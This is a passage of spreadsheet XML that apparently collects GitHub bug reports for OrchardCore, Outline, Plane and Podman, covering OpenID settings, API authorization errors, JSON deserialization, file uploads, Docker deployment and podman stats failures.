"OrchardCore.Shortcodes", "OrchardCore.ContentFields", "OrchardCore.Users", "OrchardCore.ContentPreview", "OrchardCore.Deployment", "OrchardCore.CustomSettings", "OrchardCore.Deployment.Remote", "OrchardCore.Diagnostics", "OrchardCore.DynamicCache", "OrchardCore.Widgets", "OrchardCore.Flows", "OrchardCore.HomeRoute", "OrchardCore.Html", "OrchardCore.Rules", "OrchardCore.Layers", "OrchardCore.Lists", "OrchardCore.Markdown", "OrchardCore.Media", "OrchardCore.Title", "OrchardCore.Menu", "OrchardCore.Navigation", "OrchardCore.Placements", "OrchardCore.Queries", "OrchardCore.Roles", "OrchardCore.Security", "OrchardCore.Shortcodes.Templates", "OrchardCore.Themes", "OrchardCore.Workflows", "OrchardCore.Workflows.Http", "SafeMode", "TheAdmin", "TheAgencyTheme" ] }, { "name": "WorkflowType", "data": [ { "WorkflowTypeId": "4qcvrdnwpnck85v99s6cypg3ws", "Name": "responseWriteTest", "IsEnabled": true, "IsSingleton": false, "LockTimeout": 0, "LockExpiration": 0, "DeleteFinishedWorkflows": true, "Activities": [ { "ActivityId": "4vpxs6hpwaxc45qzeqzbqh95dh", "Name": "HttpRequestEvent", "X": 0, "Y": 0, "IsStart": true, "Properties": { "ActivityMetadata": { "Title": null }, "HttpMethod": "GET", "Url": "/mv33qwd2/workflows/Invoke?token=CfDJ8ERCgEhYWqBJtj7bUEDc0fqUPbpgxfg6fGm5_29QA9X0adxzwJYSBMqpF7lqjVg57ZwZ4YWHONHLTaJxdnsv0Cg07i6xZpqyttyqYbUzYg50oc86WgCB4XlH3MFREe90ITOBeiQEKsfTASx_dlkmCpDY28Y-VQwbMqYmtd7LfNAHUOZk9NUS7B2ptdaJ1ehrnKyljz2DuJRJBGGTCfp37MtTo4BfOFPsOEqz7a2F15MH", "ValidateAntiforgeryToken": false, "TokenLifeSpan": 0 } }, { "ActivityId": "407yt6pq132en6n1p71art555v", "Name": "ScriptTask", "X": 460, "Y": 10, "IsStart": false, "Properties": { "ActivityMetadata": { "Title": null }, "AvailableOutcomes": [ "Done" ], "Script": { "Expression": "responseWrite(\"&lt;h1&gt;hello world&lt;/h1&gt;\");\r\nsetOutcome('Done');" } } } ], "Transitions": [ { "Id": 0, "SourceActivityId": "4vpxs6hpwaxc45qzeqzbqh95dh", "SourceOutcomeName": "Done", "DestinationActivityId": "407yt6pq132en6n1p71art555v" } ] } ] } ] }  (You may need to regenerate HttpRequestEvent url.)</t>
  </si>
  <si>
    <t>https://github.com/OrchardCMS/OrchardCore/issues/13671</t>
  </si>
  <si>
    <t>Setting Authority value in OpenId server does not reflect server endpoints in the well-known info</t>
  </si>
  <si>
    <t xml:space="preserve"> Describe the bug When using OpenId Server feature, one of the available settings is **Authority** or **Issuer**. When providing a specific value, the values the URI's showing for `authorization_endpoint`, `token_endpoint`, `introspection_endpoint`, `end_session_endpoint`, `revocation_endpoint`, `userinfo_endpoint`, and `jwks_uri` will still reflect the current site URL. For example, my OC app is running locally using `https://custom-domain.NET` this domain is accessible only when users on the internal network access my app. However, external apps must use `https://custom-domain.COM` in order to get to the same website. To allow external apps to connect to my app, I set the `Issuer` to `https://custom-domain.com/` which is the domain anyone can use to connect to my server. However, the value for the other endpoints still reflect the `.NET` domain not the `.COM` as I would expect. Here is the output of the `https://custom-domain.com/.well-known/openid-configuration`  { "issuer": "https://custom-domain.com/", "authorization_endpoint": "https://custom-domain.NET/connect/authorize", "token_endpoint": "https://custom-domain.NET/connect/token", "introspection_endpoint": "https://custom-domain.NET/connect/introspect", "end_session_endpoint": "https://custom-domain.NET/connect/logout", "revocation_endpoint": "https://custom-domain.NET/connect/revoke", "userinfo_endpoint": "https://custom-domain.NET/connect/userinfo", "jwks_uri": "https://custom-domain.NET/.well-known/jwks", "grant_types_supported": [ "authorization_code", "refresh_token" ], "response_types_supported": [ "code" ], "response_modes_supported": [ "form_post", "fragment", "query" ], "scopes_supported": [ "openid", "offline_access", "email", "phone", "profile", "roles" ], "claims_supported": [ "aud", "exp", "iat", "iss", "sub" ], "id_token_signing_alg_values_supported": [ "RS256" ], "code_challenge_methods_supported": [ "S256" ], "subject_types_supported": [ "public" ], "token_endpoint_auth_methods_supported": [ "client_secret_basic", "client_secret_post" ], "introspection_endpoint_auth_methods_supported": [ "client_secret_basic", "client_secret_post" ], "revocation_endpoint_auth_methods_supported": [ "client_secret_basic", "client_secret_post" ], "claims_parameter_supported": false, "request_parameter_supported": false, "request_uri_parameter_supported": false, "authorization_response_iss_parameter_supported": true }   Expected behavior I think anytime an `Authority` settings is different than the current host, the value for `authorization_endpoint`, `token_endpoint`, `introspection_endpoint`, `end_session_endpoint`, `revocation_endpoint`, `userinfo_endpoint`, and `jwks_uri` should be based on the Issue not the current site.</t>
  </si>
  <si>
    <t>https://github.com/OrchardCMS/OrchardCore/issues/15381</t>
  </si>
  <si>
    <t>OrchardCore.Contents API: Admin user is not able to GET a content, an error 401 unauthorized is returned, but if I grant all privileges to the "anonymous" user role, it works</t>
  </si>
  <si>
    <t xml:space="preserve"> Describe the bug According to what discussed [here](https://github.com/OrchardCMS/OrchardCore/discussions/15372#discussioncomment-8544179) with @hishamco, I'm opening this issue to verify it. The module `OrchardCore.Contents` exposes an `ApiController.cs` with endpoints to _create_, _update_, and _delete_ content items created in the "Admin" backoffice. Using _Postman_, it's possible to call the `ApiController.cs` endpoints after configuring the "OpenID Connect" `OpenID Authorization Server` module. I tested this using the "Try Orchard" website. **The authentication** process **is successful**, and I receive a valid OAuth 2 token. **But, when attempting to use the "Admin" user**, which is supposed to have the highest privileges, **I cannot perform GET, UPDATE, or DELETE operations**, I receive a 401 unauthorized error. **Instead, if I grant all privileges to the "anonymous" user role** to call the API, and remove the OAuth token, **it works**.  To Reproduce Steps to reproduce the behavior: NOTE: _As mentioned, I'm using a temporary "try.orchardcore" website, which is why I'm sharing the credentials here. They will expire along with the temporary website._ 1. Import the Postman collection attached [Test.postman_collection.zip](https://github.com/OrchardCMS/OrchardCore/files/14362999/Test.postman_collection.zip) (it already contains the Client Id and Secret); 2. Get an authorization token via Postman "Authorization" blade (all the fields should be already set) 3. Try to call this endpoint using GET method: https://try.orchardcore.net/jgjn0h2r/api/content/455vmd500wgrj7nqqpysw3px4s 4. You will get error 401 Unauthorized  Expected behavior The "Admin" user**, which is supposed to have the highest privileges, must be able to retrieve a content from the GET endpoint.  Screenshots Postman Authorization blade configuration ![image](https://github.com/OrchardCMS/OrchardCore/assets/19241483/26058490-0add-404f-8481-b2c4a0f35871)</t>
  </si>
  <si>
    <t>https://github.com/OrchardCMS/OrchardCore/issues/16059</t>
  </si>
  <si>
    <t>Support deserializing string to numeric property</t>
  </si>
  <si>
    <t>Previously using Newtonsoft, we ere able to deserialize a string from a string to numeric. In other words the following two json worked  {"name":"One","value":"1","Weight":1}   {"name":"One","value":"1","Weight":"1"}  when deserializing to  public sealed class CustomListValueOption : ListValueOption { public string Name { get; set; } public string Value { get; set; } public double? Weight { get; set; } }  This no longer works after converting to using System Json Text.</t>
  </si>
  <si>
    <t>https://github.com/OrchardCMS/OrchardCore/issues/16434</t>
  </si>
  <si>
    <t>Sitemap import/export does not work</t>
  </si>
  <si>
    <t xml:space="preserve"> Describe the bug I've found two STJ problems with sitemap import &amp; export. Both are related to polymorphic deserialization so it's the same bug. 1. If you try to export a new site map, the sitemap source will only contain the `Id` property, all other details are lost. It seems like the object is serialized as just `SitemapSource` instead of the derived type `ContentTypesSitemapSource`. See in the repro below. 2. When the site tries to parse a recipe from OC 1.8 containing the `"Sitemaps"` step, it throws the following, even before the recipe is executed. You can find the example error and the JSON that causes it below:  Orchard Core version The latest `main` branch and 2.0.0-preview-18268 Cloudsmith package.  To Reproduce Steps to reproduce the export error: 1. Create a site (example using Blog recipe). 2. Enable the "Sitemaps" feature. 3. Go to Admin &gt; Configuration &gt; SEO &gt; Sitemaps. 4. Add a sitemap and a "Sitemap Content Types" source (I unchecked "Index All Content Types" and picked just Page and BlogPost). 5. Go to Admin &gt; Configuration &gt; Import/Export &gt; Deployment Plans. 6. Create a deployment plan and add the "All Sitemaps" step. 7. Execute the deployment and open the resulting JSON. 8. Observe, that the `SitemapSources` is missing all details (expected something similar to the JSON in the logs section instead): json { "name": "", "displayName": "", "description": "", "author": "", "website": "", "version": "", "issetuprecipe": false, "categories": [], "tags": [], "steps": [ { "name": "Sitemaps", "data": [ { "SitemapId": "4g45p23q02vgpvm40vznd49t56", "Name": "Sitemap", "Enabled": true, "Path": "sitemap.xml", "SitemapSources": [ { "Id": "4nqc3qwb76te707aq12qapkh4y" } ], "Identifier": "4vtsxzdvm15qmxv5fbttrhh054" } ] } ] }  9. Go to Admin &gt; Configuration &gt; Import/Export &gt; JSON Import 10. Paste the freshly exported site map. 11. Observe the error message **Unexpected error occurred while executing the 'Sitemaps' step.** 12. Observe the error in the log: Unable to import a recipe from JSON input. OrchardCore.Recipes.Models.RecipeExecutionException: Deserialization of types without a parameterless constructor, a singular parameterized constructor, or a parameterized constructor annotated with 'JsonConstructorAttribute' is not supported. Type 'OrchardCore.Sitemaps.Models.SitemapType'. Path: $ | LineNumber: 0 | BytePositionInLine: 1.  Expected behavior If possible, import from OC 1.x recipe should work. If that's not feasible, a note should be added into the release notes breaking changes section. Export should include all  Logs and screenshots If applicable, add log files, browser console logs, and screenshots (or screen recording videos) to help explain your problem. This is example sitemap recipe from OC 1.8 that used to work: json { "name": "Redacted.Sitemaps", "displayName": "Redacted - Content - Sitemaps Definition", "description": "Sitemaps for Redacted site.", "author": "Lombiq", "version": "1.0", "categories": [ "content" ], "tags": [ "sitemaps" ], "steps": [ { "name": "Sitemaps", "data": [ { "$type": "OrchardCore.Sitemaps.Models.Sitemap, OrchardCore.Sitemaps.Abstractions", "SitemapId": "4vbscpv3kgcnz192hnwwggh0d7", "Name": "Sitemap", "Enabled": true, "Path": "sitemap.xml", "SitemapSources": [ { "$type": "OrchardCore.Sitemaps.Models.ContentTypesSitemapSource, OrchardCore.Sitemaps.Abstractions", "IndexAll": false, "LimitItems": false, "ChangeFrequency": 0, "Priority": 5, "ContentTypes": [ { "ContentTypeName": "BlogPost", "ChangeFrequency": 0, "Priority": 0 }, { "ContentTypeName": "Page", "ChangeFrequency": 0, "Priority": 0 } ], "Id": "45naf8my0kdgd3tsf5vwtf94xq" } ], "Identifier": "4mg5ntbxrs9c57w8nybtgvyvcf" } ] } ] }  This is the error log that shows up now:  2024-07-12 16:21:28.3105|test|00-6c4d175cf6fcafcbc633522a4d8c5e63-82c762aa10e7f9c7-00||OrchardCore.Setup.Services.SetupService|ERROR|Unable to import a recipe during setup. OrchardCore.Recipes.Models.RecipeExecutionException: Deserialization of types without a parameterless constructor, a singular parameterized constructor, or a parameterized constructor annotated with 'JsonConstructorAttribute' is not supported. Type 'OrchardCore.Sitemaps.Models.SitemapType'. Path: $ | LineNumber: 0 | BytePositionInLine: 1. &gt; System.NotSupportedException: Deserialization of types without a parameterless constructor, a singular parameterized constructor, or a parameterized constructor annotated with 'JsonConstructorAttribute' is not supported. Type 'OrchardCore.Sitemaps.Models.SitemapType'. Path: $ | LineNumber: 0 | BytePositionInLine: 1. &gt; System.NotSupportedException: Deserialization of types without a parameterless constructor, a singular parameterized constructor, or a parameterized constructor annotated with 'JsonConstructorAttribute' is not supported. Type 'OrchardCore.Sitemaps.Models.SitemapType'.  End of inner exception stack trace  at System.Text.Json.ThrowHelper.ThrowNotSupportedException(ReadStack&amp; state, Utf8JsonReader&amp; reader, NotSupportedException ex) at System.Text.Json.ThrowHelper.ThrowNotSupportedException_DeserializeNoConstructor(Type type, Utf8JsonReader&amp; reader, ReadStack&amp; state) at System.Text.Json.Serialization.Converters.ObjectDefaultConverter`1.OnTryRead(Utf8JsonReader&amp; reader, Type typeToConvert, JsonSerializerOptions options, ReadStack&amp; state, T&amp; value) at System.Text.Json.Serialization.JsonConverter`1.TryRead(Utf8JsonReader&amp; reader, Type typeToConvert, JsonSerializerOptions options, ReadStack&amp; state, T&amp; value, Boolean&amp; isPopulatedValue) at System.Text.Json.Serialization.JsonConverter`1.ReadCore(Utf8JsonReader&amp; reader, JsonSerializerOptions options, ReadStack&amp; state) at System.Text.Json.Serialization.Metadata.JsonTypeInfo`1.Deserialize(Utf8JsonReader&amp; reader, ReadStack&amp; state) at System.Text.Json.JsonSerializer.ReadFromSpan[TValue](ReadOnlySpan`1 utf8Json, JsonTypeInfo`1 jsonTypeInfo, Nullable`1 actualByteCount) at System.Text.Json.JsonSerializer.ReadFromNode[TValue](JsonNode node, JsonTypeInfo`1 jsonTypeInfo) at System.Text.Json.JsonSerializer.Deserialize[TValue](JsonNode node, JsonSerializerOptions options) at System.Text.Json.Nodes.JNode.ToObject[T](JsonNode jsonNode, JsonSerializerOptions options) at OrchardCore.Sitemaps.Recipes.SitemapsStep.ExecuteAsync(RecipeExecutionContext context) at OrchardCore.Recipes.Services.RecipeExecutor.&lt;&gt;c__DisplayClass8_0.&lt;&lt;ExecuteStepAsync&gt;b__0&gt;d.MoveNext() </t>
  </si>
  <si>
    <t>https://github.com/OrchardCMS/OrchardCore/issues/16542</t>
  </si>
  <si>
    <t>CreateContentTask evaluation will not remove illegal characters</t>
  </si>
  <si>
    <t>While upgrading to 2.0 i had a workflow with a CreateContentTask activity to create a specific content type with following liquid expression :  {% capture full_name %} {{Workflow.Input.User.Properties.UserProfileSettings.UserProfileSettings.FirstName.Text}} {{Workflow.Input.User.Properties.UserProfileSettings.UserProfileSettings.LastName.Text}} {% endcapture %} { "DisplayText": "{{full_name}}", "Owner":"{{Workflow.Input.User.UserId}}", "Author": "{{Workflow.Input.User.UserName}}", }  when ContentProperties is evaluated from :  var contentProperties = await _expressionEvaluator.EvaluateAsync(ContentProperties, workflowContext, _javaScriptEncoder);  the json to be merged is returned like this (with carriage return inside the json) :  { "DisplayText": " qqqqqqqqfname qqqqqqqqlname ", }  this results in the following error when merging with content item :  System.Text.Json.JsonReaderException: '0x0D' (CARRIAGE RETURN) is invalid within a JSON string. The string should be correctly escaped.  This was handeled automatically before 2.0 . Is there a way to remove automatically invalid json characters like previous ?</t>
  </si>
  <si>
    <t>https://github.com/OrchardCMS/OrchardCore/issues/16888</t>
  </si>
  <si>
    <t>Azure email provider can't handle display names in email addresses</t>
  </si>
  <si>
    <t xml:space="preserve"> Describe the bug The Azure email provider surfaces an exception from `Azure.Communication.Email` when it passes in email addresses that include a display name to the constructor of the `EmailAddress` class in `AzureEmailProviderBase`.  Orchard Core version 2.0  To Reproduce 1. Configure the application to use Azure Email Communication Services and enable the `Orchard.Email.Azure` feature. 2. Use the email test settings screen (`/Admin/Email/Test`) and provide an email address in the `Display Name &lt;email@domain.com&gt;` format in any of the fields that accept an email address.  Expected behavior The provider should deconstruct such email addresses and use the other overload of the `AzureEmailProviderBase` constructor which accepts a separate display name parameter too. `Orchard.Email.Smtp` handles this correctly, because MimeKit takes care of deconstructing such email addresses. The display name for the sender field is simply dropped, because the SDK doesn't support it: https://github.com/Azure/azure-sdk-for-net/issues/43847</t>
  </si>
  <si>
    <t>https://github.com/Jigsaw-Code/outline-server/issues/999</t>
  </si>
  <si>
    <t>[bug] outline manager list only 20 droplet from digital ocean</t>
  </si>
  <si>
    <t>[bug] outline manager list only 20 droplet from digital ocean if have more than 20 it show only 20</t>
  </si>
  <si>
    <t>https://github.com/Jigsaw-Code/outline-server/issues/1499</t>
  </si>
  <si>
    <t>Puth method in /access-keys needs to use {id} in the path</t>
  </si>
  <si>
    <t>The method to create a key with a specific id operates under `/access-keys/{id}` and not under just `/access-keys` https://github.com/Jigsaw-Code/outline-server/blob/64c4f945342ea7725b936a538f9b39353ee55379/src/shadowbox/server/api.yml#L178 The code is correct but the API docs are not</t>
  </si>
  <si>
    <t>https://github.com/makeplane/plane/issues/1964</t>
  </si>
  <si>
    <t>[bug] Image uploads fail with 400 error</t>
  </si>
  <si>
    <t>Plane stack version: [v0.11-dev](https://github.com/makeplane/plane/releases/tag/v0.11-dev) but issue has been seen on v0.10 as well I get an error: ![image](https://github.com/makeplane/plane/assets/10655107/367910c9-19e6-4694-8a23-90000ff426df) when trying to add any images to issues. No additional logs are seen on either backend or frontend containers, but `network` tab shows error 400 with response:  {"error":"Something went wrong please try again later"}  backend container simply logs:  172.31.0.1:39878 - "POST /api/workspaces/test/projects/2d8dda48-53ce-4e54-8fe3-136e8783685a/issues/299f6389-ddfc-4e97-9274-94d42ca1995c/issue-attachments/ HTTP/1.1" 400  double checked image formats and sizes, tried with both .jpg and .png, files sizes are under 1MB ![image](https://user-images.githubusercontent.com/10655107/262901888-87769f1b-f65e-45b5-8a84-5db9195e3817.png) p.s. i do use s3 storage (minio) and set all the credentials right on the env variables _Originally posted by @leikoilja in https://github.com/makeplane/plane/issues/1716#issuecomment-1657231768_</t>
  </si>
  <si>
    <t>https://github.com/makeplane/plane/issues/1998</t>
  </si>
  <si>
    <t>[bug]: plane sends requests on every keystroke</t>
  </si>
  <si>
    <t xml:space="preserve"> Is there an existing issue for this? - [X] I have searched the existing issues  Current behavior Whenever someone tries to create an issue by attaching 2 (or more) images and then starts typing content, Plane starts sending (failing) requests with every keystroke. This only happens when 2 or more images are attached to the issue. Here's the image of the network tab, not sure if it'll be helpful: ![image](https://github.com/makeplane/plane/assets/11243138/8a1769dd-9400-490a-bc2b-b3e5dcee5ac9)  Steps to reproduce 1. Create a new issue 2. Attach multiple images to the issue 3. Start typing in the textbox You'll notice in the network tab (and even console) that Plane sends a `DELETE` request every time a key is pressed. This shouldn't be happening, since a 1000-word issue will result in a 1000 requests being attempted.  Browser Mozilla Firefox  Version Self-hosted</t>
  </si>
  <si>
    <t>https://github.com/makeplane/plane/issues/2139</t>
  </si>
  <si>
    <t>[bug]: Project identifier rules are misleading</t>
  </si>
  <si>
    <t xml:space="preserve"> Is there an existing issue for this? - [X] I have searched the existing issues  Current behavior Creating a project results in different rules for limiting the allowed characters for the "identifier field" depending on the page you edit the field. Which currently displays 3 different rules and messages: - Identifier error message on project creation says: "Identifier must at most be of **`12 characters`**" - Identifier description in form says: "Create a **`1-6 characters`**' identifier for the project." - Actual rule and error message says: "Identifier must at most be of **`5 characters`**" Screenshots: [Create new project](https://github.com/makeplane/plane/assets/67892761/742f3611-7bac-4405-8d2c-f3a1dfd1ab42), [Edit project settings](https://github.com/makeplane/plane/assets/67892761/2c4e3f6f-ac23-471f-a035-cd8efc3db0a9)  What I expect ist: All **rules** for setting an identifier name **should be identical**, currently we have 3 different behaviours So please normalize the rules to support 1 rule for all 3 occurences of the identifier field. I would love to see the 12 characters rule applied as it provides more options to set an identifier, but I'm also fine with a max of 6 characters.  Steps to reproduce 1. Navigate to "projects" and click on `+ Add project` 2. Defining the "identifier", e.g. `A23MYLA` (which is 7 characters long) 3. Press `Create project` and navigate to "project settings" 4. After changing some stuff on the main page simply hit `Update project` 5. Saving/Updating is not possible due to an form error: "_Identifier must at most be of 5 characters_"  Browser Other (chromium based Edge)  Version Cloud</t>
  </si>
  <si>
    <t>https://github.com/makeplane/plane/issues/2152</t>
  </si>
  <si>
    <t>[bug]: Issue to login after update from 0.11 to 0.12.1</t>
  </si>
  <si>
    <t xml:space="preserve"> Is there an existing issue for this? - [X] I have searched the existing issues  Current behavior Since updating from 0.11 to 0.12.1 I can't login anymore. Here are the changes I did to my compose file after update: 1. Change `plane-worker` image to `plane-backend` 2. Add `plane-deploy` (also see this github issue #2151 ) 3. Change the frontend command form `/usr/local/bin/start.sh apps/app/server.js app` to `/usr/local/bin/start.sh web/server.js web` Now when I try to login, I get this error: ![image](https://github.com/makeplane/plane/assets/1368405/653f49db-3fd0-4fc4-b2c1-eda5e895a118) In my console, it shows the following error: ![image](https://github.com/makeplane/plane/assets/1368405/d97aff24-cabb-454c-8aa1-0d02742f9b7b) The strange thing is, that all this worked in version 0.11 but not with version 0.12 Am I missing a config? Which .env is responsible for the /api url? The `NEXT_PUBLIC_API_BASE_URL` is set correctly within my `.env` file to my plane domain  Steps to reproduce 1. Update from 0.11 to 0.12 2. Try to login  Browser Google Chrome  Version Self-hosted</t>
  </si>
  <si>
    <t xml:space="preserve">it is bug as it realeted to other issue , which is api issue , look at the coments </t>
  </si>
  <si>
    <t>https://github.com/makeplane/plane/issues/2322</t>
  </si>
  <si>
    <t>[bug]: Error 401 after updating to 0.13</t>
  </si>
  <si>
    <t xml:space="preserve"> Is there an existing issue for this? - [X] I have searched the existing issues  Current behavior After updating to version 0.13 and adjusting the docker compose file to the new schema, I see this error in my console and can't login anymore: ![image](https://github.com/makeplane/plane/assets/1368405/7cff320e-a751-4486-bd18-15f1687abf9c) Here is my compose file: yml version: '3.8' services: web: image: makeplane/plane-frontend container_name: web restart: always command: /usr/local/bin/start.sh web/server.js web env_file: - ~/files/env/web.env depends_on: - api - worker space: image: makeplane/plane-space container_name: space restart: always command: /usr/local/bin/start.sh space/server.js space env_file: - ~/files/env/space.env depends_on: - api - worker - web api: image: makeplane/plane-backend container_name: api restart: always command: ./bin/takeoff env_file: - ~/files/env/api.env depends_on: - plane-db - plane-redis worker: image: makeplane/plane-backend container_name: worker restart: always command: ./bin/worker env_file: - ~/files/env/api.env depends_on: - api - plane-db - plane-redis beat-worker: image: makeplane/plane-backend container_name: beat-worker restart: always command: ./bin/beat env_file: - ~/files/env/api.env depends_on: - api - plane-db - plane-redis plane-db: image: postgres:15.2-alpine container_name: plane-db restart: always command: postgres -c 'max_connections=1000' env_file: - .env environment: POSTGRES_USER: ${PGUSER} POSTGRES_DB: ${PGDATABASE} POSTGRES_PASSWORD: ${PGPASSWORD} PGDATA: /var/lib/postgresql/data volumes: - ~/files/db:/var/lib/postgresql/data plane-redis: image: redis:6.2.7-alpine container_name: plane-redis restart: always volumes: - ~/files/redis:/data plane-minio: image: minio/minio container_name: plane-minio restart: always volumes: - ~/files/minio:/export env_file: - .env environment: MINIO_ROOT_USER: ${AWS_ACCESS_KEY_ID} MINIO_ROOT_PASSWORD: ${AWS_SECRET_ACCESS_KEY} command: server /export --console-address ":9090" createbuckets: image: minio/mc env_file: - .env depends_on: - plane-minio entrypoint: &gt; /bin/sh -c " /usr/bin/mc config host add plane-minio http://plane-minio:9000 \$AWS_ACCESS_KEY_ID \$AWS_SECRET_ACCESS_KEY; /usr/bin/mc mb plane-minio/\$AWS_S3_BUCKET_NAME; /usr/bin/mc anonymous set download plane-minio/\$AWS_S3_BUCKET_NAME; exit 0; " proxy: image: makeplane/plane-proxy container_name: proxy restart: always ports: - ${NGINX_PORT}:80 env_file: - .env environment: FILE_SIZE_LIMIT: ${FILE_SIZE_LIMIT:-5242880} BUCKET_NAME: ${AWS_S3_BUCKET_NAME:-uploads} depends_on: - web - api - space  I also created the .env files according to the ones here on github. I'm not sure how to debug this error. This is the log of the api server:  [2023-09-29 20:31:52 +0000] [16] [INFO] Started server process [16] [2023-09-29 20:31:52 +0000] [16] [INFO] Waiting for application startup. [2023-09-29 20:31:52 +0000] [16] [INFO] ASGI 'lifespan' protocol appears unsupported. [2023-09-29 20:31:52 +0000] [16] [INFO] Application startup complete. [2023-09-29 20:31:52 +0000] [17] [INFO] Started server process [17] [2023-09-29 20:31:52 +0000] [17] [INFO] Waiting for application startup. [2023-09-29 20:31:52 +0000] [17] [INFO] ASGI 'lifespan' protocol appears unsupported. [2023-09-29 20:31:52 +0000] [17] [INFO] Application startup complete. 172.18.0.10:52438 - "GET /api/users/me/ HTTP/1.0" 401 172.18.0.10:52442 - "GET /api/users/me/ HTTP/1.0" 401 172.18.0.10:52452 - "GET /api/users/me/ HTTP/1.0" 401 172.18.0.10:34166 - "GET /api/users/me/ HTTP/1.0" 401 172.18.0.10:47386 - "GET /api/users/me/ HTTP/1.0" 401 172.18.0.10:50562 - "GET /api/users/me/ HTTP/1.0" 401 172.18.0.10:57628 - "GET /api/users/me/ HTTP/1.0" 401 172.18.0.10:55662 - "GET /api/users/me/ HTTP/1.0" 401 172.18.0.10:55678 - "GET /api/users/me/ HTTP/1.0" 401 172.18.0.10:55692 - "GET /api/users/me/ HTTP/1.0" 401 172.18.0.10:55700 - "GET /api/users/me/ HTTP/1.0" 401 172.18.0.10:55714 - "GET /api/users/me/ HTTP/1.0" 401 172.18.0.10:55724 - "POST /api/sign-in/ HTTP/1.0" 200 172.18.0.10:55730 - "GET /api/users/me/ HTTP/1.0" 401 172.18.0.10:55746 - "GET /api/users/me/ HTTP/1.0" 401   Steps to reproduce 1. Update from 0.12 to 0.13 2. Change docker compose file  Browser Google Chrome  Version Self-hosted</t>
  </si>
  <si>
    <t>https://github.com/makeplane/plane/issues/2329</t>
  </si>
  <si>
    <t>Invitation email contains localhost in invitation link. [bug]:</t>
  </si>
  <si>
    <t xml:space="preserve"> Is there an existing issue for this? - [X] I have searched the existing issues  Current behavior While inviting someone to workspace, the invitee got link like http://localhost/xxxxxxxxxxxxxxxxx  Steps to reproduce Member invited from WorkSpace member area.  Browser Mozilla Firefox  Version Self-hosted</t>
  </si>
  <si>
    <t>https://github.com/makeplane/plane/issues/2529</t>
  </si>
  <si>
    <t>[bug]: Can't upload attachments, always more than 5Mb on self-hosted server</t>
  </si>
  <si>
    <t xml:space="preserve"> Is there an existing issue for this? - [X] I have searched the existing issues  Current behavior When I try to add an image to the description box it will load inifitly. In the browser console the call to `/api/workspaces/uping/file-assets/` return "File too large. Size should not exceed 5 MB.". That is strange because the image itself is only 468kB in size (see second screenshot) ![image](https://github.com/makeplane/plane/assets/22617019/6f198d28-8d17-4ede-b1df-abaf4686df6f) ![image](https://github.com/makeplane/plane/assets/22617019/95bc395e-30a9-4ed8-be76-1a1e7b071836) When I try to upload an attachment I get a nice error toaster with the same message. ![image](https://github.com/makeplane/plane/assets/22617019/8f9e4503-2201-44be-8211-b378bf791beb) Any idea how this could be possible? I enabled debug logging but can't find much  POST - /api/workspaces/uping/file-assets/ of Queries: 1 GET - /api/workspaces/xxxxxxxxx/projects/983fc856-7f9e-4ffa-901b-7cd8d22b421d/issues/9b9f6656-d89a-42a6-a07d-1d1d5618f782/history/ of Queries: 4 172.32.0.19:33576 - "GET /api/workspaces/xxxxxxx/projects/983fc856-7f9e-4ffa-901b-7cd8d22b421d/issues/9b9f6656-d89a-42a6-a07d-1d1d5618f782/history/ HTTP/1.1" 200 Bad Request: /api/workspaces/uping/file-assets/ 172.32.0.19:33526 - "POST /api/workspaces/uping/file-assets/ HTTP/1.1" 400  Ow, I'm running version v0.13.2 in docker with docker-compose.  Steps to reproduce 1. Create a new issue 2. Add attachment or drag file in description box 3. File to large error is returned (see screenshots above)  Browser Google Chrome  Version Self-hosted</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/13824</t>
  </si>
  <si>
    <t>podman stats as root broken</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!--  BUG REPORT INFORMATION  Use the commands below to provide key information from your environment: You do NOT have to include this information if this is a FEATURE REQUEST **NOTE** A large number of issues reported against Podman are often found to already be fixed in more current versions of the project. Before reporting an issue, please verify the version you are running with `podman version` and compare it to the latest release documented on the top of Podman's [README.md](../README.md). If they differ, please update your version of Podman to the latest possible and retry your command before creating an issue. Also, there is a running list of known issues in the [Podman Troubleshooting Guide](https://github.com/containers/podman/blob/main/troubleshooting.md), please reference that page before opening a new issue. If you are filing a bug against `podman build`, please instead file a bug against Buildah (https://github.com/containers/buildah/issues). Podman build executes Buildah to perform container builds, and as such the Buildah maintainers are best equipped to handle these bugs. --&gt; **Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line)** /kind bug **Description** &lt;!-- Briefly describe the problem you are having in a few paragraphs. --&gt; **Steps to reproduce the issue:** 1. Install podman on Arch Linux (4.0.3), Centos 8 Stream (4.0.2) or use Fedora Coreos (4.0.2) 2. log in as root 3. `podman stats` **Describe the results you received:** It just prints `Error: Link not found` **Describe the results you expected:** not that **Additional information you deem important (e.g. issue happens only occasionally):** `podman stats` seems to work when run as non-root, tested on Arch Linux, but I get the same error there when run as root. Using the socket API: `curl --unix-socket /run/podman/podman.sock 'http://d/v4.0.0/libpod/containers/stats'` {"Error":{},"Stats":null} **Output of `podman version`:** 4.0.3 and 4.0.2 ** podman info -D ** From coreos:  host: arch: amd64 buildahVersion: 1.24.1 cgroupControllers: - cpuset - cpu - io - memory - hugetlb - pids - misc cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.0-2.fc36.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.0, commit: ' cpus: 4 distribution: distribution: fedora variant: coreos version: "36" eventLogger: journald hostname: dro-1 idMappings: gidmap: null uidmap: null kernel: 5.17.0-300.fc36.x86_64 linkmode: dynamic logDriver: journald memFree: 14985670656 memTotal: 16773632000 networkBackend: netavark ociRuntime: name: crun package: crun-1.4.3-1.fc36.x86_64 path: /usr/bin/crun version: |- crun version 1.4.3 commit: 61c9600d1335127eba65632731e2d72bc3f0b9e8 spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +YAJL os: linux remoteSocket: exists: true path: /run/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: false seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.0-0.2.beta.0.fc36.x86_64 version: |- slirp4netns version 1.2.0-beta.0 commit: 477db14a24ff1a3de3a705e51ca2c4c1fe3dda64 libslirp: 4.6.1 SLIRP_CONFIG_VERSION_MAX: 3 libseccomp: 2.5.3 